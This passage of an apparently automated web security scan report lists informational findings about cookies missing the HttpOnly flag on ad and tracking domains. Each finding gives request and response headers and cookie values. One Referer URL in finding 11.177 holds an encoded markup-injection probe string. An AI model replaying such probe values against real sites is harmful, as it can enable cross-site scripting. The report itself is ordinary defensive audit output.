rtc_-bBu=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; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.164. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D8586643645%3As1%3D1311254754690%3Ats%3D1311254754690; Domain=.33across.com; Expires=Sun, 22-Jul-2012 13:15:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.165. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EL4BCgGlB5GX; expires=Fri, 21-Oct-2011 04:48:53 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.166. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-c9d_b-0iR8pjg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ELQBBgGlBw; expires=Fri, 21-Oct-2011 04:48:32 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.167. http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://poweredby.kosmix.com
Path:	/external/ads/kinsert/kosmixCL.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:36:56 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/ads/kinsert/kosmixCL.js HTTP/1.1
Host: poweredby.kosmix.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:21:56 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Tue, 01 Mar 2011 00:30:02 GMT
Accept-Ranges: bytes
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:21:56 GMT
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/javascript
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:36:56 GMT;path=/

(function loadCL() {
   var s = document.createElement('script');
   s.type = "text/javascript";
   s.src = "http://www.righthealth.com/contextlinks/" + window.location.host.replace(/(www\.)|(www[0-9]\.)/,
...[SNIP]...

11.168. http://profile.live.com/Handlers/Plt.mvc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/Handlers/Plt.mvc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLERENjQ5RUFGM0M1NDIyMTcsLCwwfDEsNTEwQTk3NEVDQjk0RkIzMCwwLDEsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:40:59 GMT; path=/
sc_clustbl_142=92a870897beb4f392:0BqMqpdQLzbScLmNWQ5mybVkdxyrMVtO42vl9vl/Ct/lcNMgWb1RxFc34k6aqemFO5XdZvocPaeasXDtJXni/bkFMMFfrnbEqh4WaQ1z+HR0b6se+JVH20s+KYMw2uG9zrH4VqVChyC8uVa5g51RKtfoC4js9zFORGwxMQs1GgWIStnQsG1dUIjmKA75uVqS+3dmdMwKcmTAqbv4+eum30US//xfR1TQSc0cl18ma5V+CgYlCi4cEGM9ct5rN+A7; domain=profile.live.com; expires=Mon, 22-Aug-2011 04:40:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.169. http://profile.live.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJsdTIqMSwzMzMyQ0EzQkE2RkRGMTgxLDEsMCwwfDEsOTZCQTAzODYyRTEzMDYxMCwsMCww; domain=live.com; expires=Sat, 30-Jul-2011 04:40:33 GMT; path=/
sc_clustbl_142=31c6af2918da19922:rCpxKiBzFsqs794QovcnBwsuDd+NlvJQAjZo6kS6CpvjnkWnhuLA2BhjI+c9A3VIt11DVZAThYZ+v7HUsz0GK3T6wYFfFcLwASbdhl53Z1oH/oyEeS1OykLmNPWhyQZpBZcTfLUqrGUhziYchwegvw==; domain=profile.live.com; expires=Mon, 22-Aug-2011 04:40:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Imf: d00b3585-a50c-4153-8778-76572bf8b027
Set-Cookie: E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
Set-Cookie: xidseq=3; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 23-Jul-2011 03:00:33 GMT; path=/
Set-Cookie: wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJsdTIqMSwzMzMyQ0EzQkE2RkRGMTgxLDEsMCwwfDEsOTZCQTAzODYyRTEzMDYxMCwsMCww; domain=live.com; expires=Sat, 30-Jul-2011 04:40:33 GMT; path=/
Set-Cookie: sc_clustbl_142=31c6af2918da19922:rCpxKiBzFsqs794QovcnBwsuDd+NlvJQAjZo6kS6CpvjnkWnhuLA2BhjI+c9A3VIt11DVZAThYZ+v7HUsz0GK3T6wYFfFcLwASbdhl53Z1oH/oyEeS1OykLmNPWhyQZpBZcTfLUqrGUhziYchwegvw==; domain=profile.live.com; expires=Mon, 22-Aug-2011 04:40:33 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC565 V: 1 D: 7/13/2011
Date: Sat, 23 Jul 2011 04:40:33 GMT
Content-Length: 3531

<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311396033&rver=6.1.620
...[SNIP]...

11.170. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 21-Jul-2013 20:31:12 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.171. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4146544210108361256; Domain=.turn.com; Expires=Thu, 19-Jan-2012 04:49:14 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.172. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15176%7C15177%7C15177%7C15177%7C15177; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.173. http://rd.apmebf.com/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/get.media

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=fks3qs-19425-1311273790527-6v; domain=.apmebf.com; path=/; expires=Sat, 20-Jul-2013 18:43:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QkcXHO2060Og; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.175. http://rs.gwallet.com/r1/pixel/x960r=772053252 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x960r=772053252

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ra1_uid=4711632133175351424; Expires=Sun, 22-Jul-2012 04:49:14 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.176. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=NQARAAgBNgABAMUABgACAAgBRAQHAAUBSQACAAgBSgACAAgBDAADAAgBHABdAOQA/QABAMUAXgACANkAXwACAAgB; path=/; expires=Tue, 22 Jul 2014 13:48:20 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.177. http://sales.liveperson.net/hc/54909046/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/54909046/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101514677756-1311367259:0; expires=Sat, 21-Jul-2012 20:40:59 GMT; path=/hc/54909046; domain=.liveperson.net
HumanClickKEY=3974854717315669913; path=/hc/54909046
HumanClickSiteContainerID_54909046=STANDALONE; path=/hc/54909046
LivePersonID=-16101514677756-1311367259:-1:-1:-1:-1; expires=Sat, 21-Jul-2012 20:40:59 GMT; path=/hc/54909046; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/54909046/?&site=54909046&cmd=mTagRejectChat&lpCallId=459692581556-398106194334&protV=20&lpjson=1&page=http%3A//www.capitalone.com/directbanking/%3Flinkid%3DWWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1&id=5181734412&javaSupport=true&visitorStatus=REJECT_STATUS&defInvite=chat-ndb-sales-english&activePlugin=none&cobrowse=true&title=Personal%20Banking%20%u2014%20Capital%20One%20Bank&referrer=http%3A//www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/%3Flinkid%3DWWW_Z_Z_Z__C2_01_T_SP1ca646%25252522%2525253E%2525253Ca%2525253E91c2cd96a28&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4318047365754768807; LivePersonID=-16101514677756-1311366730:-1:1311366746:-1:-1; HumanClickSiteContainerID_54909046=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311366729736

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:40:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101514677756-1311367259:0; expires=Sat, 21-Jul-2012 20:40:59 GMT; path=/hc/54909046; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3974854717315669913; path=/hc/54909046
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 22 Jul 2011 20:40:59 GMT
Set-Cookie: HumanClickSiteContainerID_54909046=STANDALONE; path=/hc/54909046
Set-Cookie: LivePersonID=-16101514677756-1311367259:-1:-1:-1:-1; expires=Sat, 21-Jul-2012 20:40:59 GMT; path=/hc/54909046; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"459692581556-398106194334","lpCallConfirm":""}});

11.178. http://sales.liveperson.net/hc/54909046/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/54909046/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=9216878882609283496; path=/hc/54909046
HumanClickACTIVE=1311366730760; expires=Sat, 23-Jul-2011 20:32:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/54909046/?&site=54909046&cmd=mTagKnockPage&lpCallId=449048496782-691041270969&protV=20&lpjson=1&id=5181734412&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-ndb-sales-english%7ClpMTagConfig.db1%7Clpbuttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:32:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=9216878882609283496; path=/hc/54909046
Set-Cookie: HumanClickACTIVE=1311366730760; expires=Sat, 23-Jul-2011 20:32:10 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 22 Jul 2011 20:32:10 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1474

lpConnLib.Process({"ResultSet": {"lpCallId":"449048496782-691041270969","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

11.179. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJwtUUtLAmEURWcW06zmp/QD+gntC9q5a5G/IXWTkgRaiyyNySKI8g09JKESH4klVJQaRuADI6kxaARN+86hzeFw7v3OPfd+qqwYaUmVlY0ksDywCmyMLAI7Z1DaNSi+FrDXBA78siopx3Z1StFt2sFJzJCFWuLLvOhQlcmarN1frvehe/NW0T2eEzRFqxzNd0fg2z3wxAV4kMq+A0NzplW4h23a+b/7xxDFKp+mqmhxr0jCt6gIyEPt30I9vAM+m+i+4UYFZi56kcIxL8Jl45IW0QMmlojZsVsbHWUvMOCHV5FvSl1w4wuYGRK5Y8hgigm4kzNeOG+T1Z8ElPch5k1mxRavC1rQmeMWqy2o+oyg1zSpVtBc4ugKTWK80UMU1RJj6E/ALg9QZ88ew2Q9eGv+god5O9fYIuw7S4KeRiC/1SE/JsBDvEyBeV0T5IgriJREcZnyJ0+Yonvc4NQMsJXkz1D3pYHfTRhsTeN/eT0vDXo7kMOaoEfsrpkQPIuCejgoWgEGrvB3Y8xvuKU/RDC0gw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Sat, 21-Jul-2012 20:31:11 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.180. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

partnerUID="eyIxMTUiOiBbIjRlMjgyYmE5MGNlYTAwNmYiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 22-Jul-2012 13:15:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.181. http://segments.adap.tv/data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData="{\"v\":2,\"providers\":{\"24\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.182. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26922_21908_683019572=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

11.184. http://sitelife.boston.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.185. http://sm6.sitemeter.com/js/counter.asp previous next

Summary

Severity:	Information
